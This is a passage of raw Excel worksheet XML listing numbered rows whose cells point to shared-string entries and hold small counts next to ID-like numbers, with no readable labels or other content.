      </c>
      <c r="B19862" t="s">
        <v>16211</v>
      </c>
      <c r="C19862">
        <v>0</v>
      </c>
      <c r="D19862">
        <v>5628</v>
      </c>
    </row>
    <row r="19863" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19863" t="s">
        <v>16231</v>
      </c>
      <c r="B19863" t="s">
        <v>16212</v>
      </c>
      <c r="C19863">
        <v>0</v>
      </c>
      <c r="D19863">
        <v>5628</v>
      </c>
    </row>
    <row r="19864" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19864" t="s">
        <v>16228</v>
      </c>
      <c r="B19864" t="s">
        <v>16213</v>
      </c>
      <c r="C19864">
        <v>0</v>
      </c>
      <c r="D19864">
        <v>5628</v>
      </c>
    </row>
    <row r="19865" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19865" t="s">
        <v>16231</v>
      </c>
      <c r="B19865" t="s">
        <v>16214</v>
      </c>
      <c r="C19865">
        <v>0</v>
      </c>
      <c r="D19865">
        <v>5628</v>
      </c>
    </row>
    <row r="19866" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19866" t="s">
        <v>16228</v>
      </c>
      <c r="B19866" t="s">
        <v>16215</v>
      </c>
      <c r="C19866">
        <v>1</v>
      </c>
      <c r="D19866">
        <v>5628</v>
      </c>
    </row>
    <row r="19867" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19867" t="s">
        <v>16228</v>
      </c>
      <c r="B19867" t="s">
        <v>16211</v>
      </c>
      <c r="C19867">
        <v>0</v>
      </c>
      <c r="D19867">
        <v>5623</v>
      </c>
    </row>
    <row r="19868" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19868" t="s">
        <v>16231</v>
      </c>
      <c r="B19868" t="s">
        <v>16216</v>
      </c>
      <c r="C19868">
        <v>2</v>
      </c>
      <c r="D19868">
        <v>5628</v>
      </c>
    </row>
    <row r="19869" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19869" t="s">
        <v>16231</v>
      </c>
      <c r="B19869" t="s">
        <v>16212</v>
      </c>
      <c r="C19869">
        <v>0</v>
      </c>
      <c r="D19869">
        <v>5623</v>
      </c>
    </row>
    <row r="19870" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19870" t="s">
        <v>16228</v>
      </c>
      <c r="B19870" t="s">
        <v>16217</v>
      </c>
      <c r="C19870">
        <v>3</v>
      </c>
      <c r="D19870">
        <v>5628</v>
      </c>
    </row>
    <row r="19871" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19871" t="s">
        <v>16228</v>
      </c>
      <c r="B19871" t="s">
        <v>16213</v>
      </c>
      <c r="C19871">
        <v>0</v>
      </c>
      <c r="D19871">
        <v>5623</v>
      </c>
    </row>
    <row r="19872" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19872" t="s">
        <v>16231</v>
      </c>
      <c r="B19872" t="s">
        <v>16218</v>
      </c>
      <c r="C19872">
        <v>4</v>
      </c>
      <c r="D19872">
        <v>5628</v>
      </c>
    </row>
    <row r="19873" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19873" t="s">
        <v>16231</v>
      </c>
      <c r="B19873" t="s">
        <v>16214</v>
      </c>
      <c r="C19873">
        <v>0</v>
      </c>
      <c r="D19873">
        <v>5623</v>
      </c>
    </row>
    <row r="19874" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19874" t="s">
        <v>16229</v>
      </c>
      <c r="B19874" t="s">
        <v>16219</v>
      </c>
      <c r="C19874">
        <v>0</v>
      </c>
      <c r="D19874">
        <v>5628</v>
      </c>
    </row>
    <row r="19875" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19875" t="s">
        <v>16228</v>
      </c>
      <c r="B19875" t="s">
        <v>16215</v>
      </c>
      <c r="C19875">
        <v>0</v>
      </c>
      <c r="D19875">
        <v>5623</v>
      </c>
    </row>
    <row r="19876" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19876" t="s">
        <v>16230</v>
      </c>
      <c r="B19876" t="s">
        <v>16220</v>
      </c>
      <c r="C19876">
        <v>0</v>
      </c>
      <c r="D19876">
        <v>5628</v>
      </c>
    </row>
    <row r="19877" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19877" t="s">
        <v>16231</v>
      </c>
      <c r="B19877" t="s">
        <v>16216</v>
      </c>
      <c r="C19877">
        <v>1</v>
      </c>
      <c r="D19877">
        <v>5623</v>
      </c>
    </row>
    <row r="19878" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19878" t="s">
        <v>16229</v>
      </c>
      <c r="B19878" t="s">
        <v>16221</v>
      </c>
      <c r="C19878">
        <v>2</v>
      </c>
      <c r="D19878">
        <v>5628</v>
      </c>
    </row>
    <row r="19879" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19879" t="s">
        <v>16228</v>
      </c>
      <c r="B19879" t="s">
        <v>16217</v>
      </c>
      <c r="C19879">
        <v>1</v>
      </c>
      <c r="D19879">
        <v>5623</v>
      </c>
    </row>
    <row r="19880" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19880" t="s">
        <v>16230</v>
      </c>
      <c r="B19880" t="s">
        <v>16222</v>
      </c>
      <c r="C19880">
        <v>4</v>
      </c>
      <c r="D19880">
        <v>5628</v>
      </c>
    </row>
    <row r="19881" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19881" t="s">
        <v>16231</v>
      </c>
      <c r="B19881" t="s">
        <v>16218</v>
      </c>
      <c r="C19881">
        <v>3</v>
      </c>
      <c r="D19881">
        <v>5623</v>
      </c>
    </row>
    <row r="19882" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19882" t="s">
        <v>16223</v>
      </c>
      <c r="B19882" t="s">
        <v>16223</v>
      </c>
      <c r="C19882">
        <v>25</v>
      </c>
      <c r="D19882">
        <v>5628</v>
      </c>
    </row>
    <row r="19883" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19883" t="s">
        <v>16229</v>
      </c>
      <c r="B19883" t="s">
        <v>16219</v>
      </c>
      <c r="C19883">
        <v>0</v>
      </c>
      <c r="D19883">
        <v>5623</v>
      </c>
    </row>
    <row r="19884" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19884" t="s">
        <v>16224</v>
      </c>
      <c r="B19884" t="s">
        <v>16224</v>
      </c>
      <c r="C19884">
        <v>1</v>
      </c>
      <c r="D19884">
        <v>5628</v>
      </c>
    </row>
    <row r="19885" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19885" t="s">
        <v>16230</v>
      </c>
      <c r="B19885" t="s">
        <v>16220</v>
      </c>
      <c r="C19885">
        <v>0</v>
      </c>
      <c r="D19885">
        <v>5623</v>
      </c>
    </row>
    <row r="19886" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19886" t="s">
        <v>16229</v>
      </c>
      <c r="B19886" t="s">
        <v>16221</v>
      </c>
      <c r="C19886">
        <v>0</v>
      </c>
      <c r="D19886">
        <v>5623</v>
      </c>
    </row>
    <row r="19887" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19887" t="s">
        <v>16230</v>
      </c>
      <c r="B19887" t="s">
        <v>16222</v>
      </c>
      <c r="C19887">
        <v>0</v>
      </c>
      <c r="D19887">
        <v>5623</v>
      </c>
    </row>
    <row r="19888" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19888" t="s">
        <v>16223</v>
      </c>
      <c r="B19888" t="s">
        <v>16223</v>
      </c>
      <c r="C19888">
        <v>25</v>
      </c>
      <c r="D19888">
        <v>5623</v>
      </c>
    </row>
    <row r="19889" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19889" t="s">
        <v>16224</v>
      </c>
      <c r="B19889" t="s">
        <v>16224</v>
      </c>
      <c r="C19889">
        <v>1</v>
      </c>
      <c r="D19889">
        <v>5623</v>
      </c>
    </row>
    <row r="19890" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19890" t="s">
        <v>16228</v>
      </c>
      <c r="B19890" t="s">
        <v>16211</v>
      </c>
      <c r="C19890">
        <v>1</v>
      </c>
      <c r="D19890">
        <v>5220</v>
      </c>
    </row>
    <row r="19891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19891" t="s">
        <v>16231</v>
      </c>
      <c r="B19891" t="s">
        <v>16212</v>
      </c>
      <c r="C19891">
        <v>1</v>
      </c>
      <c r="D19891">
        <v>5220</v>
      </c>
    </row>
    <row r="19892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19892" t="s">
        <v>16228</v>
      </c>
      <c r="B19892" t="s">
        <v>16213</v>
      </c>
      <c r="C19892">
        <v>2</v>
      </c>
      <c r="D19892">
        <v>5220</v>
      </c>
    </row>
    <row r="19893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19893" t="s">
        <v>16231</v>
      </c>
      <c r="B19893" t="s">
        <v>16214</v>
      </c>
      <c r="C19893">
        <v>5</v>
      </c>
      <c r="D19893">
        <v>5220</v>
      </c>
    </row>
    <row r="19894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19894" t="s">
        <v>16228</v>
      </c>
      <c r="B19894" t="s">
        <v>16215</v>
      </c>
      <c r="C19894">
        <v>1</v>
      </c>
      <c r="D19894">
        <v>5220</v>
      </c>
    </row>
    <row r="19895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19895" t="s">
        <v>16231</v>
      </c>
      <c r="B19895" t="s">
        <v>16216</v>
      </c>
      <c r="C19895">
        <v>1</v>
      </c>
      <c r="D19895">
        <v>5220</v>
      </c>
    </row>
    <row r="19896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19896" t="s">
        <v>16228</v>
      </c>
      <c r="B19896" t="s">
        <v>16217</v>
      </c>
      <c r="C19896">
        <v>2</v>
      </c>
      <c r="D19896">
        <v>5220</v>
      </c>
    </row>
    <row r="19897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19897" t="s">
        <v>16231</v>
      </c>
      <c r="B19897" t="s">
        <v>16218</v>
      </c>
      <c r="C19897">
        <v>2</v>
      </c>
      <c r="D19897">
        <v>5220</v>
      </c>
    </row>
    <row r="19898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19898" t="s">
        <v>16229</v>
      </c>
      <c r="B19898" t="s">
        <v>16219</v>
      </c>
      <c r="C19898">
        <v>0</v>
      </c>
      <c r="D19898">
        <v>5220</v>
      </c>
    </row>
    <row r="19899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19899" t="s">
        <v>16230</v>
      </c>
      <c r="B19899" t="s">
        <v>16220</v>
      </c>
      <c r="C19899">
        <v>0</v>
      </c>
      <c r="D19899">
        <v>5220</v>
      </c>
    </row>
    <row r="19900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19900" t="s">
        <v>16229</v>
      </c>
      <c r="B19900" t="s">
        <v>16221</v>
      </c>
      <c r="C19900">
        <v>0</v>
      </c>
      <c r="D19900">
        <v>5220</v>
      </c>
    </row>
    <row r="19901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19901" t="s">
        <v>16230</v>
      </c>
      <c r="B19901" t="s">
        <v>16222</v>
      </c>
      <c r="C19901">
        <v>3</v>
      </c>
      <c r="D19901">
        <v>5220</v>
      </c>
    </row>
    <row r="19902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19902" t="s">
        <v>16223</v>
      </c>
      <c r="B19902" t="s">
        <v>16223</v>
      </c>
      <c r="C19902">
        <v>25</v>
      </c>
      <c r="D19902">
        <v>5220</v>
      </c>
    </row>
    <row r="19903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19903" t="s">
        <v>16224</v>
      </c>
      <c r="B19903" t="s">
        <v>16224</v>
      </c>
      <c r="C19903">
        <v>1</v>
      </c>
      <c r="D19903">
        <v>5220</v>
      </c>
    </row>
    <row r="19904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19904" t="s">
        <v>16228</v>
      </c>
      <c r="B19904" t="s">
        <v>16211</v>
      </c>
      <c r="C19904">
        <v>0</v>
      </c>
      <c r="D19904">
        <v>5651</v>
      </c>
    </row>
    <row r="19905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19905" t="s">
        <v>16231</v>
      </c>
      <c r="B19905" t="s">
        <v>16212</v>
      </c>
      <c r="C19905">
        <v>0</v>
      </c>
      <c r="D19905">
        <v>5651</v>
      </c>
    </row>
    <row r="19906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19906" t="s">
        <v>16228</v>
      </c>
      <c r="B19906" t="s">
        <v>16213</v>
      </c>
      <c r="C19906">
        <v>0</v>
      </c>
      <c r="D19906">
        <v>5651</v>
      </c>
    </row>
    <row r="19907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19907" t="s">
        <v>16231</v>
      </c>
      <c r="B19907" t="s">
        <v>16214</v>
      </c>
      <c r="C19907">
        <v>0</v>
      </c>
      <c r="D19907">
        <v>5651</v>
      </c>
    </row>
    <row r="19908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19908" t="s">
        <v>16228</v>
      </c>
      <c r="B19908" t="s">
        <v>16215</v>
      </c>
      <c r="C19908">
        <v>1</v>
      </c>
      <c r="D19908">
        <v>5651</v>
      </c>
    </row>
    <row r="19909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19909" t="s">
        <v>16231</v>
      </c>
      <c r="B19909" t="s">
        <v>16216</v>
      </c>
      <c r="C19909">
        <v>2</v>
      </c>
      <c r="D19909">
        <v>5651</v>
      </c>
    </row>
    <row r="19910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19910" t="s">
        <v>16228</v>
      </c>
      <c r="B19910" t="s">
        <v>16217</v>
      </c>
      <c r="C19910">
        <v>0</v>
      </c>
      <c r="D19910">
        <v>5651</v>
      </c>
    </row>
    <row r="19911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19911" t="s">
        <v>16231</v>
      </c>
      <c r="B19911" t="s">
        <v>16218</v>
      </c>
      <c r="C19911">
        <v>0</v>
      </c>
      <c r="D19911">
        <v>5651</v>
      </c>
    </row>
    <row r="19912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19912" t="s">
        <v>16229</v>
      </c>
      <c r="B19912" t="s">
        <v>16219</v>
      </c>
      <c r="C19912">
        <v>0</v>
      </c>
      <c r="D19912">
        <v>5651</v>
      </c>
    </row>
    <row r="19913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19913" t="s">
        <v>16230</v>
      </c>
      <c r="B19913" t="s">
        <v>16220</v>
      </c>
      <c r="C19913">
        <v>0</v>
      </c>
      <c r="D19913">
        <v>5651</v>
      </c>
    </row>
    <row r="19914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19914" t="s">
        <v>16229</v>
      </c>
      <c r="B19914" t="s">
        <v>16221</v>
      </c>
      <c r="C19914">
        <v>4</v>
      </c>
      <c r="D19914">
        <v>5651</v>
      </c>
    </row>
    <row r="19915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19915" t="s">
        <v>16230</v>
      </c>
      <c r="B19915" t="s">
        <v>16222</v>
      </c>
      <c r="C19915">
        <v>10</v>
      </c>
      <c r="D19915">
        <v>5651</v>
      </c>
    </row>
    <row r="19916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19916" t="s">
        <v>16223</v>
      </c>
      <c r="B19916" t="s">
        <v>16223</v>
      </c>
      <c r="C19916">
        <v>6</v>
      </c>
      <c r="D19916">
        <v>5651</v>
      </c>
    </row>
    <row r="19917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19917" t="s">
        <v>16224</v>
      </c>
      <c r="B19917" t="s">
        <v>16224</v>
      </c>
      <c r="C19917">
        <v>1</v>
      </c>
      <c r="D19917">
        <v>5651</v>
      </c>
    </row>
    <row r="19918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19918" t="s">
        <v>16228</v>
      </c>
      <c r="B19918" t="s">
        <v>16211</v>
      </c>
      <c r="C19918">
        <v>0</v>
      </c>
      <c r="D19918">
        <v>1718</v>
      </c>
    </row>
    <row r="19919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19919" t="s">
        <v>16231</v>
      </c>
      <c r="B19919" t="s">
        <v>16212</v>
      </c>
      <c r="C19919">
        <v>0</v>
      </c>
      <c r="D19919">
        <v>1718</v>
      </c>
    </row>
    <row r="19920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19920" t="s">
        <v>16228</v>
      </c>
      <c r="B19920" t="s">
        <v>16213</v>
      </c>
      <c r="C19920">
        <v>0</v>
      </c>
      <c r="D19920">
        <v>1718</v>
      </c>
    </row>
    <row r="19921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19921" t="s">
        <v>16231</v>
      </c>
      <c r="B19921" t="s">
        <v>16214</v>
      </c>
      <c r="C19921">
        <v>0</v>
      </c>
      <c r="D19921">
        <v>1718</v>
      </c>
    </row>
    <row r="19922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19922" t="s">
        <v>16228</v>
      </c>
      <c r="B19922" t="s">
        <v>16215</v>
      </c>
      <c r="C19922">
        <v>2</v>
      </c>
      <c r="D19922">
        <v>1718</v>
      </c>
    </row>
    <row r="19923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19923" t="s">
        <v>16231</v>
      </c>
      <c r="B19923" t="s">
        <v>16216</v>
      </c>
      <c r="C19923">
        <v>3</v>
      </c>
      <c r="D19923">
        <v>1718</v>
      </c>
    </row>
    <row r="19924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19924" t="s">
        <v>16228</v>
      </c>
      <c r="B19924" t="s">
        <v>16217</v>
      </c>
      <c r="C19924">
        <v>3</v>
      </c>
      <c r="D19924">
        <v>1718</v>
      </c>
    </row>
    <row r="19925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19925" t="s">
        <v>16231</v>
      </c>
      <c r="B19925" t="s">
        <v>16218</v>
      </c>
      <c r="C19925">
        <v>20</v>
      </c>
      <c r="D19925">
        <v>1718</v>
      </c>
    </row>
    <row r="19926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19926" t="s">
        <v>16229</v>
      </c>
      <c r="B19926" t="s">
        <v>16219</v>
      </c>
      <c r="C19926">
        <v>0</v>
      </c>
      <c r="D19926">
        <v>1718</v>
      </c>
    </row>
    <row r="19927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19927" t="s">
        <v>16230</v>
      </c>
      <c r="B19927" t="s">
        <v>16220</v>
      </c>
      <c r="C19927">
        <v>0</v>
      </c>
      <c r="D19927">
        <v>1718</v>
      </c>
    </row>
    <row r="19928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19928" t="s">
        <v>16229</v>
      </c>
      <c r="B19928" t="s">
        <v>16221</v>
      </c>
      <c r="C19928">
        <v>0</v>
      </c>
      <c r="D19928">
        <v>1718</v>
      </c>
    </row>
    <row r="19929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19929" t="s">
        <v>16230</v>
      </c>
      <c r="B19929" t="s">
        <v>16222</v>
      </c>
      <c r="C19929">
        <v>0</v>
      </c>
      <c r="D19929">
        <v>1718</v>
      </c>
    </row>
    <row r="19930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19930" t="s">
        <v>16223</v>
      </c>
      <c r="B19930" t="s">
        <v>16223</v>
      </c>
      <c r="C19930">
        <v>26</v>
      </c>
      <c r="D19930">
        <v>1718</v>
      </c>
    </row>
    <row r="19931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19931" t="s">
        <v>16224</v>
      </c>
      <c r="B19931" t="s">
        <v>16224</v>
      </c>
      <c r="C19931">
        <v>1</v>
      </c>
      <c r="D19931">
        <v>1718</v>
      </c>
    </row>
    <row r="19932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19932" t="s">
        <v>16228</v>
      </c>
      <c r="B19932" t="s">
        <v>16211</v>
      </c>
      <c r="C19932">
        <v>0</v>
      </c>
      <c r="D19932">
        <v>1804</v>
      </c>
    </row>
    <row r="19933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19933" t="s">
        <v>16231</v>
      </c>
      <c r="B19933" t="s">
        <v>16212</v>
      </c>
      <c r="C19933">
        <v>0</v>
      </c>
      <c r="D19933">
        <v>1804</v>
      </c>
    </row>
    <row r="19934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19934" t="s">
        <v>16228</v>
      </c>
      <c r="B19934" t="s">
        <v>16213</v>
      </c>
      <c r="C19934">
        <v>0</v>
      </c>
      <c r="D19934">
        <v>1804</v>
      </c>
    </row>
    <row r="19935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19935" t="s">
        <v>16231</v>
      </c>
      <c r="B19935" t="s">
        <v>16214</v>
      </c>
      <c r="C19935">
        <v>0</v>
      </c>
      <c r="D19935">
        <v>1804</v>
      </c>
    </row>
    <row r="19936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19936" t="s">
        <v>16228</v>
      </c>
      <c r="B19936" t="s">
        <v>16215</v>
      </c>
      <c r="C19936">
        <v>1</v>
      </c>
      <c r="D19936">
        <v>1804</v>
      </c>
    </row>
    <row r="19937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19937" t="s">
        <v>16231</v>
      </c>
      <c r="B19937" t="s">
        <v>16216</v>
      </c>
      <c r="C19937">
        <v>2</v>
      </c>
      <c r="D19937">
        <v>1804</v>
      </c>
    </row>
    <row r="19938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19938" t="s">
        <v>16228</v>
      </c>
      <c r="B19938" t="s">
        <v>16217</v>
      </c>
      <c r="C19938">
        <v>10</v>
      </c>
      <c r="D19938">
        <v>1804</v>
      </c>
    </row>
    <row r="19939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19939" t="s">
        <v>16231</v>
      </c>
      <c r="B19939" t="s">
        <v>16218</v>
      </c>
      <c r="C19939">
        <v>2</v>
      </c>
      <c r="D19939">
        <v>1804</v>
      </c>
    </row>
    <row r="19940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19940" t="s">
        <v>16229</v>
      </c>
      <c r="B19940" t="s">
        <v>16219</v>
      </c>
      <c r="C19940">
        <v>0</v>
      </c>
      <c r="D19940">
        <v>1804</v>
      </c>
    </row>
    <row r="19941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19941" t="s">
        <v>16230</v>
      </c>
      <c r="B19941" t="s">
        <v>16220</v>
      </c>
      <c r="C19941">
        <v>0</v>
      </c>
      <c r="D19941">
        <v>1804</v>
      </c>
    </row>
    <row r="19942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19942" t="s">
        <v>16229</v>
      </c>
      <c r="B19942" t="s">
        <v>16221</v>
      </c>
      <c r="C19942">
        <v>0</v>
      </c>
      <c r="D19942">
        <v>1804</v>
      </c>
    </row>
    <row r="19943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19943" t="s">
        <v>16230</v>
      </c>
      <c r="B19943" t="s">
        <v>16222</v>
      </c>
      <c r="C19943">
        <v>0</v>
      </c>
      <c r="D19943">
        <v>1804</v>
      </c>
    </row>
    <row r="19944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19944" t="s">
        <v>16223</v>
      </c>
      <c r="B19944" t="s">
        <v>16223</v>
      </c>
      <c r="C19944">
        <v>24</v>
      </c>
      <c r="D19944">
        <v>1804</v>
      </c>
    </row>
    <row r="19945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19945" t="s">
        <v>16224</v>
      </c>
      <c r="B19945" t="s">
        <v>16224</v>
      </c>
      <c r="C19945">
        <v>2</v>
      </c>
      <c r="D19945">
        <v>1804</v>
      </c>
    </row>
    <row r="19946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19946" t="s">
        <v>16228</v>
      </c>
      <c r="B19946" t="s">
        <v>16211</v>
      </c>
      <c r="C19946">
        <v>0</v>
      </c>
      <c r="D19946">
        <v>1803</v>
      </c>
    </row>
    <row r="19947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19947" t="s">
        <v>16231</v>
      </c>
      <c r="B19947" t="s">
        <v>16212</v>
      </c>
      <c r="C19947">
        <v>0</v>
      </c>
      <c r="D19947">
        <v>1803</v>
      </c>
    </row>
    <row r="19948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19948" t="s">
        <v>16228</v>
      </c>
      <c r="B19948" t="s">
        <v>16213</v>
      </c>
      <c r="C19948">
        <v>0</v>
      </c>
      <c r="D19948">
        <v>1803</v>
      </c>
    </row>
    <row r="19949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19949" t="s">
        <v>16231</v>
      </c>
      <c r="B19949" t="s">
        <v>16214</v>
      </c>
      <c r="C19949">
        <v>0</v>
      </c>
      <c r="D19949">
        <v>1803</v>
      </c>
    </row>
    <row r="19950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19950" t="s">
        <v>16228</v>
      </c>
      <c r="B19950" t="s">
        <v>16215</v>
      </c>
      <c r="C19950">
        <v>2</v>
      </c>
      <c r="D19950">
        <v>1803</v>
      </c>
    </row>
    <row r="19951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19951" t="s">
        <v>16231</v>
      </c>
      <c r="B19951" t="s">
        <v>16216</v>
      </c>
      <c r="C19951">
        <v>0</v>
      </c>
      <c r="D19951">
        <v>1803</v>
      </c>
    </row>
    <row r="19952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19952" t="s">
        <v>16228</v>
      </c>
      <c r="B19952" t="s">
        <v>16217</v>
      </c>
      <c r="C19952">
        <v>3</v>
      </c>
      <c r="D19952">
        <v>1803</v>
      </c>
    </row>
    <row r="19953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19953" t="s">
        <v>16231</v>
      </c>
      <c r="B19953" t="s">
        <v>16218</v>
      </c>
      <c r="C19953">
        <v>0</v>
      </c>
      <c r="D19953">
        <v>1803</v>
      </c>
    </row>
    <row r="19954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19954" t="s">
        <v>16229</v>
      </c>
      <c r="B19954" t="s">
        <v>16219</v>
      </c>
      <c r="C19954">
        <v>0</v>
      </c>
      <c r="D19954">
        <v>1803</v>
      </c>
    </row>
    <row r="19955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19955" t="s">
        <v>16230</v>
      </c>
      <c r="B19955" t="s">
        <v>16220</v>
      </c>
      <c r="C19955">
        <v>0</v>
      </c>
      <c r="D19955">
        <v>1803</v>
      </c>
    </row>
    <row r="19956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19956" t="s">
        <v>16229</v>
      </c>
      <c r="B19956" t="s">
        <v>16221</v>
      </c>
      <c r="C19956">
        <v>0</v>
      </c>
      <c r="D19956">
        <v>1803</v>
      </c>
    </row>
    <row r="19957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19957" t="s">
        <v>16230</v>
      </c>
      <c r="B19957" t="s">
        <v>16222</v>
      </c>
      <c r="C19957">
        <v>0</v>
      </c>
      <c r="D19957">
        <v>1803</v>
      </c>
    </row>
    <row r="19958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19958" t="s">
        <v>16223</v>
      </c>
      <c r="B19958" t="s">
        <v>16223</v>
      </c>
      <c r="C19958">
        <v>26</v>
      </c>
      <c r="D19958">
        <v>1803</v>
      </c>
    </row>
    <row r="19959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19959" t="s">
        <v>16224</v>
      </c>
      <c r="B19959" t="s">
        <v>16224</v>
      </c>
      <c r="C19959">
        <v>0</v>
      </c>
      <c r="D19959">
        <v>1803</v>
      </c>
    </row>
    <row r="19960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19960" t="s">
        <v>16228</v>
      </c>
      <c r="B19960" t="s">
        <v>16211</v>
      </c>
      <c r="C19960">
        <v>0</v>
      </c>
      <c r="D19960">
        <v>5615</v>
      </c>
    </row>
    <row r="19961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19961" t="s">
        <v>16231</v>
      </c>
      <c r="B19961" t="s">
        <v>16212</v>
      </c>
      <c r="C19961">
        <v>0</v>
      </c>
      <c r="D19961">
        <v>5615</v>
      </c>
    </row>
    <row r="19962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19962" t="s">
        <v>16228</v>
      </c>
      <c r="B19962" t="s">
        <v>16213</v>
      </c>
      <c r="C19962">
        <v>0</v>
      </c>
      <c r="D19962">
        <v>5615</v>
      </c>
    </row>
    <row r="19963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19963" t="s">
        <v>16231</v>
      </c>
      <c r="B19963" t="s">
        <v>16214</v>
      </c>
      <c r="C19963">
        <v>0</v>
      </c>
      <c r="D19963">
        <v>5615</v>
      </c>
    </row>
    <row r="19964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19964" t="s">
        <v>16228</v>
      </c>
      <c r="B19964" t="s">
        <v>16215</v>
      </c>
      <c r="C19964">
        <v>1</v>
      </c>
      <c r="D19964">
        <v>5615</v>
      </c>
    </row>
    <row r="19965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19965" t="s">
        <v>16231</v>
      </c>
      <c r="B19965" t="s">
        <v>16216</v>
      </c>
      <c r="C19965">
        <v>2</v>
      </c>
      <c r="D19965">
        <v>5615</v>
      </c>
    </row>
    <row r="19966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19966" t="s">
        <v>16228</v>
      </c>
      <c r="B19966" t="s">
        <v>16217</v>
      </c>
      <c r="C19966">
        <v>5</v>
      </c>
      <c r="D19966">
        <v>5615</v>
      </c>
    </row>
    <row r="19967" spans="1:4" x14ac:dyDescent="0.2">
